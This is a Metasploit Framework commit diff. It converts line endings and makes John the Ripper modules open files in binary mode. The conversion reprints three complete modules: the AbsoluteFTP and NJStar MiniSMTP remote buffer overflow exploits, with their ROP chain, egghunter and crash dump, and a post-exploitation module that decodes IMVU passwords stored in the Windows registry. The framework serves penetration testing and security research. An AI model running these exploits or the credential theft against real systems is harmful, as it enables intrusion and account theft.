Fixes #5749 by converting to unix-style linefeeds and forcing jtr modules to read files as binary, and updating msftidy to allow for r+b as a ghetto append.

unstable
Tod Beardsley 2011-11-28 17:52:34 -06:00
parent c411c216c0
commit f503bd9488
12 changed files with 472 additions and 453 deletions

View File

@ -55,7 +55,7 @@ class Metasploit3 < Msf::Auxiliary
unless myloots.nil? or myloots.empty?
myloots.each do |myloot|
begin
usf = File.open(myloot.path)
usf = File.open(myloot.path, "rb")
rescue Exception => e
print_error("Unable to read #{myloot.path} \n #{e}")
end
@ -157,7 +157,7 @@ class Metasploit3 < Msf::Auxiliary
john_cracked_passwords.values {|v| seed << v }
#Grab the default John Wordlist
john = File.open(john_wordlist_path, "r")
john = File.open(john_wordlist_path, "rb")
john.each_line{|line| seed << line.chomp}
unless seed.empty?

View File

@ -80,7 +80,7 @@ class Metasploit3 < Msf::Auxiliary
john_cracked_passwords.values {|v| seed << v }
#Grab the default John Wordlist
john = File.open(john_wordlist_path, "r")
john = File.open(john_wordlist_path, "rb")
john.each_line{|line| seed << line.chomp}
return seed

View File

@ -146,7 +146,7 @@ class Metasploit3 < Msf::Auxiliary
john_cracked_passwords.values {|v| seed << v }
#Grab the default John Wordlist
john = File.open(john_wordlist_path, "r")
john = File.open(john_wordlist_path, "rb")
john.each_line{|line| seed << line.chomp}
return seed

View File

@ -78,7 +78,7 @@ class Metasploit3 < Msf::Auxiliary
john_cracked_passwords.values {|v| seed << v }
#Grab the default John Wordlist
john = File.open(john_wordlist_path, "r")
john = File.open(john_wordlist_path, "rb")
john.each_line{|line| seed << line.chomp}
return seed

View File

@ -124,11 +124,11 @@ class Metasploit3 < Msf::Auxiliary
john_cracked_passwords.values {|v| seed << v }
#Grab the default John Wordlist
john = File.open(john_wordlist_path, "r")
john = File.open(john_wordlist_path, "rb")
john.each_line{|line| seed << line.chomp}
if datastore['Wordlist']
wordlist= File.open(datastore['Wordlist'], "r")
wordlist= File.open(datastore['Wordlist'], "rb")
wordlist.each_line{|line| seed << line.chomp}
end

View File

@ -330,6 +330,7 @@ class Metasploit3 < Msf::Auxiliary
end
#copy paste from rex::socket cause we need only ipv4
#NOTE: Breaks msftidy's rule on long lines, should be refactored for readability.
def is_ipv4?(addr)
(addr =~ /^(?:(?:25[0-5]|2[0-4][0-9]|[0-1]?[0-9]{1,2})[.](?:25[0-5]|2[0-4][0-9]|[0-1]?[0-9]{1,2})[.](?:25[0-5]|2[0-4][0-9]|[0-1]?[0-9]{1,2})[.](?:25[0-5]|2[0-4][0-9]|[0-1]?[0-9]{1,2}))$/) ? true : false
end

View File

@ -16,6 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote
#
# This module does basically nothing
# NOTE: Because of this it's missing a disclosure date that makes msftidy angry.
#
def initialize(info = {})

View File

@ -1,145 +1,146 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::FtpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'AbsoluteFTP 1.9.6 - 2.2.10 Remote Buffer Overflow (LIST)',
'Description' => %q{
This module exploits VanDyke Software AbsoluteFTP by overflowing
a filename buffer related to the LIST command.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Node', # Original discovery, MSF module, ROP code
],
'References' =>
[
#[ 'OSVDB', '---' ],
#[ 'CVE', '---' ],
[ 'URL', 'http://www.exploit-db.com/exploits/18102/' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x0d\x5c\x2f\x0a",
},
'Targets' =>
[
[
'WinXP SP2 - Windows 7 SP1 / AbsoluteFTP 1.9.6 - 2.2.10.252',
{
'Ret' => 0x5f479005,
'Offset' => 3336
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Nov 9 2011',
'DefaultTarget' => 0))
end
#copypasted from ScriptFTP exploit
def on_client_unknown_command(c,cmd,arg)
c.put("200 OK\r\n")
end
def on_client_command_list(c,arg)
conn = establish_data_connection(c)
if(not conn)
c.put("425 Can't build data connection\r\n")
return
end
print_status(" - Data connection set up")
code = 150
c.put("#{code} Here comes the directory listing.\r\n")
code = 226
c.put("#{code} Directory send ok.\r\n")
rop_gadgets =
[
0x5f46a206, # POP EAX # RETN (MFC42.DLL)
0x5f49b260, # <- *&VirtualProtect()
0x5f413fa0, # MOV EAX,DWORD PTR DS:[EAX] # RETN 04 ** [MFC42.DLL]
0x5f418d93, # PUSH EAX # ADD AL,5F # POP ESI # POP EBX # RETN ** [MFC42.DLL]
0x90909090, # NOPS (RETN 4)
0x90909090, # NOPS (-> ebx)
0x5f432001, # POP EBP # RETN (MFC42.DLL)
0x5F4774D5, # ptr to 'jmp esp' (from MFC42.DLL)
0x5f46a206, # POP EAX # RETN (MFC42.DLL)
0xfffffdff, # value to negate, target value : 0x00000201, target reg : ebx #<--ADJUST ME FOR BIGGER PAYLOAD
0x5f46f6dd, # NEG EAX # RETN (MFC42.DLL)
0x5f47909a, # XCHG EAX,EBX # DEC EDX # POP EDI # RETN (MFC42.DLL)
0x90909090, # NOPS (-> edi)
0x5f498456, # POP ECX # RETN (MFC42.DLL)
0x5F4D1115, # RW pointer (lpOldProtect) (-> ecx) !!!
0x5f46a206, # POP EAX # RETN (MFC42.DLL)
0xffffffc0, # value to negate, target value : 0x00000040, target reg : edx
0x5f46f6dd, # NEG EAX # RETN (MFC42.DLL)
0x5f4892df, # XCHG EAX,EDX # DEC EAX # POP EDI # RETN (MFC42.DLL)
0x5f479005, # ROP NOP (-> edi)
0x5f46a206, # POP EAX # RETN (MFC42.DLL)
0x90909090, # NOPS (-> eax)
0x5f4755b8, # PUSHAD # RETN (MFC42.DLL)
].pack("V*")
buffer = [0x5f479005].pack("V*")*848 #ROP NOP's
buffer << rop_gadgets
buffer << "\x90"*30
buffer << payload.encoded
#copypasted from ScriptFTP exploit
print_status(" - Sending directory list via data connection")
dirlist = "-rwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 #{buffer}.txt\r\n"
dirlist << " 5 ftpuser ftpusers 512 Jul 26 2001 A\r\n"
dirlist << "rwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 #{buffer}.txt\r\n"
conn.put(dirlist)
conn.close
return
end
end
=begin
Exploit has been tested to work on:
AbsoluteFTP 2.2.10 (build 252)
AbsoluteFTP 2.2.9 (build 248)
AbsoluteFTP 2.2.8 (build 241)
AbsoluteFTP 2.2.7 (build 238)
AbsoluteFTP 2.2.6 (build 230)
AbsoluteFTP 2.2.5 (build 225)
AbsoluteFTP 2.2.4 (build 216)
AbsoluteFTP 2.2.3 (build 210)
AbsoluteFTP 2.2.2 (build 203)
AbsoluteFTP 2.2 (build 197)
AbsoluteFTP 2.2 (build 291)
AbsoluteFTP 2.2B3 (build 163)
AbsoluteFTP 2.2B2 (build 158)
AbsoluteFTP 2.2B1 (build 144)
AbsoluteFTP 2.0.5 (build 297)
AbsoluteFTP 2.0.4 (build 293)
AbsoluteFTP 2.0.3 (build 289)
AbsoluteFTP 1.9.6
Does not work on:
AbsoluteFTP 1.8
=end
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::FtpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'AbsoluteFTP 1.9.6 - 2.2.10 Remote Buffer Overflow (LIST)',
'Description' => %q{
This module exploits VanDyke Software AbsoluteFTP by overflowing
a filename buffer related to the LIST command.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Node', # Original discovery, MSF module, ROP code
],
'References' =>
[
#[ 'OSVDB', '---' ],
#[ 'CVE', '---' ],
[ 'URL', 'http://www.exploit-db.com/exploits/18102/' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x0d\x5c\x2f\x0a",
},
'Targets' =>
[
[
'WinXP SP2 - Windows 7 SP1 / AbsoluteFTP 1.9.6 - 2.2.10.252',
{
'Ret' => 0x5f479005,
'Offset' => 3336
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Nov 9 2011',
'DefaultTarget' => 0))
end
#copypasted from ScriptFTP exploit
def on_client_unknown_command(c,cmd,arg)
c.put("200 OK\r\n")
end
def on_client_command_list(c,arg)
conn = establish_data_connection(c)
if(not conn)
c.put("425 Can't build data connection\r\n")
return
end
print_status(" - Data connection set up")
code = 150
c.put("#{code} Here comes the directory listing.\r\n")
code = 226
c.put("#{code} Directory send ok.\r\n")
rop_gadgets =
[
0x5f46a206, # POP EAX # RETN (MFC42.DLL)
0x5f49b260, # <- *&VirtualProtect()
0x5f413fa0, # MOV EAX,DWORD PTR DS:[EAX] # RETN 04 ** [MFC42.DLL]
0x5f418d93, # PUSH EAX # ADD AL,5F # POP ESI # POP EBX # RETN ** [MFC42.DLL]
0x90909090, # NOPS (RETN 4)
0x90909090, # NOPS (-> ebx)
0x5f432001, # POP EBP # RETN (MFC42.DLL)
0x5F4774D5, # ptr to 'jmp esp' (from MFC42.DLL)
0x5f46a206, # POP EAX # RETN (MFC42.DLL)
0xfffffdff, # value to negate, target value : 0x00000201, target reg : ebx #<--ADJUST ME FOR BIGGER PAYLOAD
0x5f46f6dd, # NEG EAX # RETN (MFC42.DLL)
0x5f47909a, # XCHG EAX,EBX # DEC EDX # POP EDI # RETN (MFC42.DLL)
0x90909090, # NOPS (-> edi)
0x5f498456, # POP ECX # RETN (MFC42.DLL)
0x5F4D1115, # RW pointer (lpOldProtect) (-> ecx) !!!
0x5f46a206, # POP EAX # RETN (MFC42.DLL)
0xffffffc0, # value to negate, target value : 0x00000040, target reg : edx
0x5f46f6dd, # NEG EAX # RETN (MFC42.DLL)
0x5f4892df, # XCHG EAX,EDX # DEC EAX # POP EDI # RETN (MFC42.DLL)
0x5f479005, # ROP NOP (-> edi)
0x5f46a206, # POP EAX # RETN (MFC42.DLL)
0x90909090, # NOPS (-> eax)
0x5f4755b8, # PUSHAD # RETN (MFC42.DLL)
].pack("V*")
buffer = [0x5f479005].pack("V*")*848 #ROP NOP's
buffer << rop_gadgets
buffer << "\x90"*30
buffer << payload.encoded
#copypasted from ScriptFTP exploit
print_status(" - Sending directory list via data connection")
dirlist = "-rwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 #{buffer}.txt\r\n"
dirlist << " 5 ftpuser ftpusers 512 Jul 26 2001 A\r\n"
dirlist << "rwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 #{buffer}.txt\r\n"
conn.put(dirlist)
conn.close
return
end
end
=begin
Exploit has been tested to work on:
AbsoluteFTP 2.2.10 (build 252)
AbsoluteFTP 2.2.9 (build 248)
AbsoluteFTP 2.2.8 (build 241)
AbsoluteFTP 2.2.7 (build 238)
AbsoluteFTP 2.2.6 (build 230)
AbsoluteFTP 2.2.5 (build 225)
AbsoluteFTP 2.2.4 (build 216)
AbsoluteFTP 2.2.3 (build 210)
AbsoluteFTP 2.2.2 (build 203)
AbsoluteFTP 2.2 (build 197)
AbsoluteFTP 2.2 (build 291)
AbsoluteFTP 2.2B3 (build 163)
AbsoluteFTP 2.2B2 (build 158)
AbsoluteFTP 2.2B1 (build 144)
AbsoluteFTP 2.0.5 (build 297)
AbsoluteFTP 2.0.4 (build 293)
AbsoluteFTP 2.0.3 (build 289)
AbsoluteFTP 1.9.6
Does not work on:
AbsoluteFTP 1.8
=end

View File

@ -1,204 +1,205 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Egghunter
def initialize(info = {})
super(update_info(info,
'Name' => 'NJStar Communicator 3.00 MiniSMTP Server Remote Exploit',
'Description' => %q{
This module exploits a stack buffer overflow vulnerability in NJStar Communicator
Version 3.00 MiniSMTP server. The MiniSMTP application can be seen in multiple
NJStar products, and will continue to run in the background even if the
software is already shutdown. According to the vendor's testimonials,
NJStar software is also used by well known companies such as Siemens, NEC,
Google, Yahoo, eBay; government agencies such as the FBI, Department of
Justice (HK); as well as a long list of universities such as Yale, Harvard,
University of Tokyo, etc.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Dillon Beresford', # Original discovery and MSF Module.
],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '76728' ],
#[ 'CVE', '' ],
[ 'URL', 'http://www.njstar.com/cms/njstar-communicator' ],
[ 'URL', 'http://www.exploit-db.com/exploits/18057/' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00",
'StackAdjustment' => -1500,
},
'Targets' =>
[
[
'Windows XP SP2/SP3',
{
'Ret' => 0x77c35459, # PUSH ESP; RETN (MSVCRT.dll)
'Offset' => 247,
}
],
[
# Can't test patch level on this one, because you can't
# even update Win2k3 SP0 anymore from Windows Update
'Windows Server 2003 SP0',
{
'Ret' => 0x77d20738, # JMP ESP (USER32.dll)
'Offset' => 247,
}
],
[
'Windows Server 2003 SP1/SP2',
{
'Ret' => 0x77BE2265, # PUSH ESP; RETN (MSVCRT.dll)
'Offset' => 247,
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Oct 31 2011',
'DefaultTarget' => 0))
register_options([Opt::RPORT(25)], self.class)
end
def check
connect
# We get a response like: "220 [host-name] Service Ready"
# But we don't really care about this one
res = sock.get_once(-1, 5)
vprint_status("Banner: #{res.to_s.chop}")
sock.puts("HELP\r\n")
# But the HELP response will tell us if this is a NJStar SMTP or not
res = sock.get_once(-1, 5)
vprint_status("HELP Response: #{res.to_s.chop}")
disconnect
# I can only flag it as "Detected" because it doesn't return a version
if res =~ /Windows E-mail Server From NJStar Software/i
return Exploit::CheckCode::Detected
end
return Exploit::CheckCode::Safe
end
def exploit
eggoptions =
{
:checksum => true,
:eggtag => "w00t"
}
hunter,egg = generate_egghunter(payload.encoded,payload_badchars,eggoptions)
buffer = rand_text(target['Offset'])
buffer << [target.ret].pack('V')
buffer << hunter
buffer << make_nops(4)
# Just some debugging output so we can see lengths and byte size of each of our buffer.
vprint_status("egg: %u bytes: \n" % egg.length + Rex::Text.to_hex_dump(egg))
vprint_status("hunter: %u bytes: \n" % hunter.length + Rex::Text.to_hex_dump(hunter))
vprint_status("buffer: %u bytes:\n" % buffer.length + Rex::Text.to_hex_dump(buffer))
print_status("Trying target #{target.name}...")
# har har har you get trick no treat...
# we dont have very much space so we
# send our egg in a seperate connection
connect
print_status("Sending the egg...")
sock.put(egg)
# I think you betta call, ghostbusters...
# now we send our evil buffer along with the
# egg hunter, we are doing multiple connections
# to solve the issue with limited stack space.
# thanks to bannedit for advice on threads and
# making multiple connections to get around
# stack space constraints. :)
connect
print_status("Sending our buffer containing the egg hunter...")
sock.put(buffer)
handler
disconnect
end
end
=begin
Dillon Beresford
https://twitter.com/#!/D1N
NJStar Communicator
Version: 3.00 and prior
Build: 11818 and prior
Tested minismtp version:
1.30.0.60218
Shouts to bannedit, sinn3r, rick2600, tmanning, corelanc0d3r, jcran,
manils, d0tslash, mublix, halsten, and everyone at AHA!
No response as of 10/31/11 from AUSCERT or the software vendor. CNCERT and USCERT responded
on 10/30/11 and 10/31/11, CNCERT said in an email they needed to see if the vulnerability
is remotely exploitable and needed more verification. I sent a proof of concept exploit
in python with remote code execution. So, here is the proof that the bug is, in fact,
remotely exploitable. WIN!
System DLLs are used for target.ret because minismtp.exe is the only NJStar component in
memory, and its base starts with a 0x00, that's no good. However, if your target machine
started minismtp from the Windows start menu (Start -> All Programs -> NJStar Communicator
-> NJStar MiniSmtp), it'd actually load up more DLLs. And one of them -- MSVCR100.dll -- is
ideal enough to use (No rebase, starts with a high address, but there is an ASLR flag).
eax=00000000 ebx=00417bf8 ecx=00002745 edx=00000000 esi=008a3e50
edi=008a3d80
eip=42424242 esp=00ccff70 ebp=7c8097d0 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00010206
42424242 ?? ???
0:003> !exchain
image00400000+bbc4 (0040bbc4)
00ccff00: 41414141
Invalid exception stack at 41414141
0:003> d esp
00ccff70 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
00ccff80 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
00ccff90 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
00ccffa0 44 44 44 44 00 ff cc 00-c4 bb 40 00 20 23 41 00 DDDD......@. #A.
00ccffb0 00 00 00 00 ec ff cc 00-29 b7 80 7c b8 3d 8a 00 ........)..|.=..
00ccffc0 00 00 00 00 00 00 00 00-b8 3d 8a 00 00 c0 fd 7f .........=......
00ccffd0 00 d6 e3 89 c0 ff cc 00-98 08 99 89 ff ff ff ff ................
00ccffe0 d8 9a 83 7c 30 b7 80 7c-00 00 00 00 00 00 00 00 ...|0..|........
=end
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Egghunter
def initialize(info = {})
super(update_info(info,
'Name' => 'NJStar Communicator 3.00 MiniSMTP Server Remote Exploit',
'Description' => %q{
This module exploits a stack buffer overflow vulnerability in NJStar Communicator
Version 3.00 MiniSMTP server. The MiniSMTP application can be seen in multiple
NJStar products, and will continue to run in the background even if the
software is already shutdown. According to the vendor's testimonials,
NJStar software is also used by well known companies such as Siemens, NEC,
Google, Yahoo, eBay; government agencies such as the FBI, Department of
Justice (HK); as well as a long list of universities such as Yale, Harvard,
University of Tokyo, etc.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Dillon Beresford', # Original discovery and MSF Module.
],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '76728' ],
#[ 'CVE', '' ],
[ 'URL', 'http://www.njstar.com/cms/njstar-communicator' ],
[ 'URL', 'http://www.exploit-db.com/exploits/18057/' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00",
'StackAdjustment' => -1500,
},
'Targets' =>
[
[
'Windows XP SP2/SP3',
{
'Ret' => 0x77c35459, # PUSH ESP; RETN (MSVCRT.dll)
'Offset' => 247,
}
],
[
# Can't test patch level on this one, because you can't
# even update Win2k3 SP0 anymore from Windows Update
'Windows Server 2003 SP0',
{
'Ret' => 0x77d20738, # JMP ESP (USER32.dll)
'Offset' => 247,
}
],
[
'Windows Server 2003 SP1/SP2',
{
'Ret' => 0x77BE2265, # PUSH ESP; RETN (MSVCRT.dll)
'Offset' => 247,
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Oct 31 2011',
'DefaultTarget' => 0))
register_options([Opt::RPORT(25)], self.class)
end
def check
connect
# We get a response like: "220 [host-name] Service Ready"
# But we don't really care about this one
res = sock.get_once(-1, 5)
vprint_status("Banner: #{res.to_s.chop}")
sock.puts("HELP\r\n")
# But the HELP response will tell us if this is a NJStar SMTP or not
res = sock.get_once(-1, 5)
vprint_status("HELP Response: #{res.to_s.chop}")
disconnect
# I can only flag it as "Detected" because it doesn't return a version
if res =~ /Windows E-mail Server From NJStar Software/i
return Exploit::CheckCode::Detected
end
return Exploit::CheckCode::Safe
end
def exploit
eggoptions =
{
:checksum => true,
:eggtag => "w00t"
}
hunter,egg = generate_egghunter(payload.encoded,payload_badchars,eggoptions)
buffer = rand_text(target['Offset'])
buffer << [target.ret].pack('V')
buffer << hunter
buffer << make_nops(4)
# Just some debugging output so we can see lengths and byte size of each of our buffer.
vprint_status("egg: %u bytes: \n" % egg.length + Rex::Text.to_hex_dump(egg))
vprint_status("hunter: %u bytes: \n" % hunter.length + Rex::Text.to_hex_dump(hunter))
vprint_status("buffer: %u bytes:\n" % buffer.length + Rex::Text.to_hex_dump(buffer))
print_status("Trying target #{target.name}...")
# har har har you get trick no treat...
# we dont have very much space so we
# send our egg in a seperate connection
connect
print_status("Sending the egg...")
sock.put(egg)
# I think you betta call, ghostbusters...
# now we send our evil buffer along with the
# egg hunter, we are doing multiple connections
# to solve the issue with limited stack space.
# thanks to bannedit for advice on threads and
# making multiple connections to get around
# stack space constraints. :)
connect
print_status("Sending our buffer containing the egg hunter...")
sock.put(buffer)
handler
disconnect
end
end
=begin
Dillon Beresford
https://twitter.com/#!/D1N
NJStar Communicator
Version: 3.00 and prior
Build: 11818 and prior
Tested minismtp version:
1.30.0.60218
Shouts to bannedit, sinn3r, rick2600, tmanning, corelanc0d3r, jcran,
manils, d0tslash, mublix, halsten, and everyone at AHA!
No response as of 10/31/11 from AUSCERT or the software vendor. CNCERT and USCERT responded
on 10/30/11 and 10/31/11, CNCERT said in an email they needed to see if the vulnerability
is remotely exploitable and needed more verification. I sent a proof of concept exploit
in python with remote code execution. So, here is the proof that the bug is, in fact,
remotely exploitable. WIN!
System DLLs are used for target.ret because minismtp.exe is the only NJStar component in
memory, and its base starts with a 0x00, that's no good. However, if your target machine
started minismtp from the Windows start menu (Start -> All Programs -> NJStar Communicator
-> NJStar MiniSmtp), it'd actually load up more DLLs. And one of them -- MSVCR100.dll -- is
ideal enough to use (No rebase, starts with a high address, but there is an ASLR flag).
eax=00000000 ebx=00417bf8 ecx=00002745 edx=00000000 esi=008a3e50
edi=008a3d80
eip=42424242 esp=00ccff70 ebp=7c8097d0 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00010206
42424242 ?? ???
0:003> !exchain
image00400000+bbc4 (0040bbc4)
00ccff00: 41414141
Invalid exception stack at 41414141
0:003> d esp
00ccff70 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
00ccff80 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
00ccff90 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
00ccffa0 44 44 44 44 00 ff cc 00-c4 bb 40 00 20 23 41 00 DDDD......@. #A.
00ccffb0 00 00 00 00 ec ff cc 00-29 b7 80 7c b8 3d 8a 00 ........)..|.=..
00ccffc0 00 00 00 00 00 00 00 00-b8 3d 8a 00 00 c0 fd 7f .........=......
00ccffd0 00 d6 e3 89 c0 ff cc 00-98 08 99 89 ff ff ff ff ................
00ccffe0 d8 9a 83 7c 30 b7 80 7c-00 00 00 00 00 00 00 00 ...|0..|........
=end

View File

@ -1,94 +1,95 @@
##
# $Id: enum_imvu.rb 14100 2011-10-28 18:00:10Z thelightcosine $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/post/windows/registry'
require 'msf/core/post/windows/user_profiles'
class Metasploit3 < Msf::Post
include Msf::Post::Windows::Registry
include Msf::Auxiliary::Report
include Msf::Post::Windows::UserProfiles
def initialize(info = {})
super(update_info(info,
'Name' => 'Post Windows Gather Credentials IMVU Game Client',
'Description' => %q{
This module extracts account username & password from the IMVU game client
and stores it as loot.
},
'Author' =>
[
'Shubham Dawra <shubham2dawra[at]gmail.com>' # www.SecurityXploded.com
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 14100 $',
'Platform' => [ 'windows' ],
'SessionTypes' => [ 'meterpreter' ]
))
end
def run
creds = Rex::Ui::Text::Table.new(
'Header' => 'IMVU Credentials',
'Indent' => 1,
'Columns' =>[
'User',
'Password'
]
)
credcount=0
userhives=load_missing_hives()
userhives.each do |hive|
next if hive['HKU'] == nil
print_status("Looking at Key #{hive['HKU']}") if datastore['VERBOSE']
subkeys = registry_enumkeys("#{hive['HKU']}\\Software\\IMVU\\")
if subkeys.nil? or subkeys.empty?
print_status ("IMVU not installed for this user.")
next
end
user = registry_getvaldata("#{hive['HKU']}\\Software\\IMVU\\username\\", "")
hpass = registry_getvaldata("#{hive['HKU']}\\Software\\IMVU\\password\\", "")
decpass = [ hpass.downcase.gsub(/'/,'').gsub(/\\?x([a-f0-9][a-f0-9])/, '\1') ].pack("H*")
print_good("User=#{user}, Password=#{decpass}")
creds << [user, decpass]
credcount = (credcount + 1)
end
#clean up after ourselves
unload_our_hives(userhives)
print_status("#{credcount} Credentials were found.")
if credcount > 0
print_status("Storing data...")
path = store_loot(
'imvu.user.creds',
'text/csv',
session,
creds.to_csv,
'imvu_user_creds.csv',
'IMVU User Credentials'
)
print_status("IMVU user credentials saved in: #{path}")
end
end
end
##
# $Id: enum_imvu.rb 14100 2011-10-28 18:00:10Z thelightcosine $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/post/windows/registry'
require 'msf/core/post/windows/user_profiles'
class Metasploit3 < Msf::Post
include Msf::Post::Windows::Registry
include Msf::Auxiliary::Report
include Msf::Post::Windows::UserProfiles
def initialize(info = {})
super(update_info(info,
'Name' => 'Post Windows Gather Credentials IMVU Game Client',
'Description' => %q{
This module extracts account username & password from the IMVU game client
and stores it as loot.
},
'Author' =>
[
'Shubham Dawra <shubham2dawra[at]gmail.com>' # www.SecurityXploded.com
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 14100 $',
'Platform' => [ 'windows' ],
'SessionTypes' => [ 'meterpreter' ]
))
end
def run
creds = Rex::Ui::Text::Table.new(
'Header' => 'IMVU Credentials',
'Indent' => 1,
'Columns' =>[
'User',
'Password'
]
)
credcount=0
userhives=load_missing_hives()
userhives.each do |hive|
next if hive['HKU'] == nil
print_status("Looking at Key #{hive['HKU']}") if datastore['VERBOSE']
subkeys = registry_enumkeys("#{hive['HKU']}\\Software\\IMVU\\")
if subkeys.nil? or subkeys.empty?
print_status ("IMVU not installed for this user.")
next
end
user = registry_getvaldata("#{hive['HKU']}\\Software\\IMVU\\username\\", "")
hpass = registry_getvaldata("#{hive['HKU']}\\Software\\IMVU\\password\\", "")
decpass = [ hpass.downcase.gsub(/'/,'').gsub(/\\?x([a-f0-9][a-f0-9])/, '\1') ].pack("H*")
print_good("User=#{user}, Password=#{decpass}")
creds << [user, decpass]
credcount = (credcount + 1)
end
#clean up after ourselves
unload_our_hives(userhives)
print_status("#{credcount} Credentials were found.")
if credcount > 0
print_status("Storing data...")
path = store_loot(
'imvu.user.creds',
'text/csv',
session,
creds.to_csv,
'imvu_user_creds.csv',
'IMVU User Credentials'
)
print_status("IMVU user credentials saved in: #{path}")
end
end
end

View File

@ -92,8 +92,22 @@ client.railgun.add_function( 'netapi32', 'NetUserEnum', 'DWORD',[
=end
client.railgun.add_function( 'netapi32', 'NetServerEnum', 'DWORD',[["PBLOB","servername","in"],["DWORD","level","in"],["PDWORD","bufptr","out"],["DWORD","prefmaxlen","in"],["PDWORD","entriesread","out"],["PDWORD","totalentries","out"],["DWORD","servertype","in"],["PWCHAR","domain","in"],["DWORD","resume_handle","inout"]])
client.railgun.add_function( 'ws2_32', 'getaddrinfo', 'DWORD',[["PCHAR","pNodeName","in"],["PCHAR","pServiceName","in"],["PDWORD","pHints","in"],["PDWORD","ppResult","out"]])
client.railgun.add_function(
'netapi32', 'NetServerEnum', 'DWORD',
[
["PBLOB","servername","in"], ["DWORD","level","in"], ["PDWORD","bufptr","out"],
["DWORD","prefmaxlen","in"], ["PDWORD","entriesread","out"], ["PDWORD","totalentries","out"],
["DWORD","servertype","in"], ["PWCHAR","domain","in"], ["DWORD","resume_handle","inout"]
]
)
client.railgun.add_function(
'ws2_32', 'getaddrinfo', 'DWORD',
[
["PCHAR","pNodeName","in"], ["PCHAR","pServiceName","in"],
["PDWORD","pHints","in"], ["PDWORD","ppResult","out"]
]
)
domain = nil

View File

@ -103,7 +103,7 @@ def check_single_file(dparts, fparts, f_rel)
cr += 1 if ln =~ /\r$/
url_ok = false if ln =~ /\.com\/projects\/Framework/
if ln =~ /File\.open/ and ln =~ /[\"\'][arw]/
if not ln =~ /[\"\'][wra]b\+?[\"\']/
if not ln =~ /[\"\'][wra]\+?b\+?[\"\']/
nbo += 1
end
end